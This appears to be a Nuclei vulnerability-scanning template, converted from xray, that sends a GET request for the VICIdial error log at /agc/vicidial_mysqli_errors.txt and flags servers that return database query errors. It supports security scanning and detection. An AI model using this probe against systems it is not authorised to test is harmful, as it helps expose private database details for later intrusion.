id: poc-yaml-vicidial-info-leak

info:
  name: poc-yaml-vicidial-info-leak
  author: xiaobaicai
  severity: medium
  tags: xray-converted,exposure,ct-483371
  reference:
    - http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/VICIdial/VICIdial%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md

http:
  - raw:
      - |
        GET /agc/vicidial_mysqli_errors.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "vdc_db_query"
      - type: regex
        part: body
        regex:
          - "[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9] [0-9][0-9]:[0-9][0-9]:[0-9][0-9]|vdc_db_query|[0-9][0-9][0-9][0-9][0-9]"